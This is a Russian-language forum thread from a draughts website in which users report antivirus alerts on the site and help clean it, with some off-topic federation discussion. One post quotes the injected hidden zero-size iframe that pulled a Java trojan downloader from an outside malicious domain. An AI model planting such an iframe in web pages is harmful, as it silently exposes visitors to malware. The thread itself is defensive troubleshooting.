| Автор |
Сообщение |
Symix |
|
Тема сообщения:
 Отправлено: Янв 08, 2010 - 02:21 AM
|
|
Зарегистрирован: Мар 11, 2004
Сообщений: 2096
Откуда : Hollywood, Florida
|
|
Зaшел на shashki.com
Мой avasр на одном компютере бьет тревогу
Win32:Rootkit-gen [Rtk] Malware
потом сайт захотел инстoлать програму из Индии
CA (Computer Associates) не показывает проблем.
Публичный компютер в клубе пускает на сайт но обьявляет вирусу на любом линке форума. |
|
|
| |
|
|
|
 |
|
Symix |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 05:23 AM
|
|
Зарегистрирован: Мар 11, 2004
Сообщений: 2096
Откуда : Hollywood, Florida
|
|
| Специально поехал в клуб проверять. Не знаю какой там антивирус. На этот топик допустила, на Задачки от Бужинского нет. Говорит "identity theft" - но это она всегда говорит о сайте shashki.com. Но вот послать ответ оттуда не смог, сайт отказал. |
|
|
| |
|
|
|
|
|
Fenix |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 06:42 AM
|
|
Зарегистрирован: Сен 01, 2002
Сообщений: 8715
|
|
Забавно.
А у меня просто Опера сама закрывается. |
_________________
love is an answer
|
| |
|
|
|
|
|
A.Presman |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 08:26 AM
|
|
Зарегистрирован: Авг 31, 2002
Сообщений: 537
|
|
Касперский говорит.
detected: Trojan program Trojan-Downloader.Java.OpenStream.af file: http://generatorwand.cn//0.icq/myf/y/LoaderX.class
Когда он это сказал я посмотрел сурс странички. А там скрытый iframe.
Код:
<iframe src="http://generatorwand.cn//index.php?s=b49f084d83d6446674ea76bf78e8c9dc" width="0" height="0" frameborder="0"></iframe>
Это он. |
|
|
| |
|
|
|
|
|
AlexanderS |
|
|
Тема сообщения: Re: Вирус на сайте.
Отправлено: Янв 08, 2010 - 09:44 AM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
Старенький вирус, странно что касперкий его не видит. Судя по всему Ваша локальная машинка уже тоже заражена, последователями, так что перед тем как выкачивать содержимое и пытаться лечить проверьте себя всем возможным...
Что касается PNphpBB2 - ни разу с ним не сталкивался, но он вроде как динамичный, может в каком-то статическом шаблоне вирь прописался...
Virus: HTML/Infected.WebPage.Gen
Date discovered: 14/08/2007
Type: Trojan
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No
Engine version: 7.04.01.62
Description:
A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online again. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code. |
|
|
| |
|
|
|
|
|
AlexanderS |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 02:11 PM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
Alkand писал(а): Вот же... просмотрел самую первую строку с ифрэймом  привык, что вирусы дописывают себя в конец файла.
Вроде теперь должно быть чисто. Просто совпало, что сразу два (надеюсь, не больше) вируса залезло...
На страницы форума антивирус больше не ругается, но главная страница и любой article - все равно вылазит тот же вирус. Хотя после лечения IE уже открывает страницы |
|
|
| |
|
|
|
|
|
AlexanderS |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 02:15 PM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
|
|
|
|
|
Alkand |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 06:28 PM
|
|
Зарегистрирован: Июль 16, 2002
Сообщений: 3652
Откуда : Москва
|
|
Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно  |
_________________
Aurora Borealis - единственный инструментарий для истинных профессионалов 
|
| |
|
|
|
|
|
AlexanderS |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 08:06 PM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
Alkand писал(а): Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно
Не-а :( Все равно вылазит. Не на всех, но на большинстве страниц. Кэш на всякий случай очистил так что уверен что тянется с сайта... |
|
|
| |
|
|
|
|
|
ALGIMANTAS |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 10:31 PM
|
|
Зарегистрирован: Авг 27, 2002
Сообщений: 5766
|
|
По моему, "вирус" и в добавлений комментариев к текстам на новостной ленте..
Хотел добавить комментарий к теме на новостной ленте о чекерсе. Три раза пробовал - "не проходит". Если это только для "профессоров", простите, не надо. Никто, кроме нескольких фанатиков, не будет затруднять себя.
г.Александру - сотрите там мои неудачные попытки. Из - за уважения к dammen (этот коллега заметный на этом Форуме), короткий свой ответ ему даю здесь (извиняюсь перед г.Александром за off top):
To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška |
|
|
| |
|
|
|
|
|
dammen |
|
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 11:15 PM
|
|
Зарегистрирован: Июнь 19, 2008
Сообщений: 240
|
|
ALGIMANTAS писал(а):
To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška
Благодарю Вас за ответ, господин ALGIMANTAS!
С этим отчётом я ознакомился до ГА, а отсутствие официальных лиц от WCDF вероятно, объясняется неизвестными нам вескими причинами. Надеюсь, alemo внесёт ясность в вопросах взаимоотношений WCDF и FMJD, календаря WCDF-2010 и турнира претендентов в Ирландии. |
|
|
| |
|
|
|
|
|
uvf25 |
|
|
Тема сообщения:
Отправлено: Янв 09, 2010 - 05:24 AM
|
|
Зарегистрирован: Окт 27, 2006
Сообщений: 75
|
|
Мой "Касперский" уже третий день обнаруживает и нейтрализует на главной странице при первом входе:
09.01.2010 10:20:52 Обнаружено: Trojan.Win32.Fregee.a Ujjgnlsuw Tszqovwfmgjegjwzc C:\TEMP\8E.tmp
Затем всё работает нормально. |
|
|
| |
|
|
|
|
|
Натуля |
|
|
Тема сообщения:
Отправлено: Янв 10, 2010 - 09:59 AM
|
|
Зарегистрирован: Май 24, 2004
Сообщений: 161
|
|
опять этот уродец  |
|
|
| |
|
|
|
|
|
Натуля |
|
|
Тема сообщения:
Отправлено: Янв 10, 2010 - 10:02 AM
|
|
Зарегистрирован: Май 24, 2004
Сообщений: 161
|
|
троянская программа Trojan.Win32.Fregee.a
вылез в теме ЧМ по 100 в Берлине
ps опять принудительный перезагруз(((((( стока всего открыто нужного))) |
|
|
| |
|
|
|
|
|
berg |
|
|
Тема сообщения:
Отправлено: Янв 10, 2010 - 07:38 PM
|
|
Зарегистрирован: Сен 21, 2005
Сообщений: 353
Откуда : Минск
|
|
Доктор сказал:"C:\Documents and Settings\G....o\Local Settings\Temporary Internet Files\Content.IE5\8RNTSG08\Dtp1NZuedRL2cE34[1].pdf\data001 - инфицирован JS.DownLoader.85"
Два дня назад был другой.
Александр Борисович, это похоже на наезд |
|
|
| |
|
|
|
|
|
|
Главная 
FAQ
Поиск
Регистрация
Войти и проверить личные сообщения
Войти 
Под-Форум
Maximize
Поиск по сайту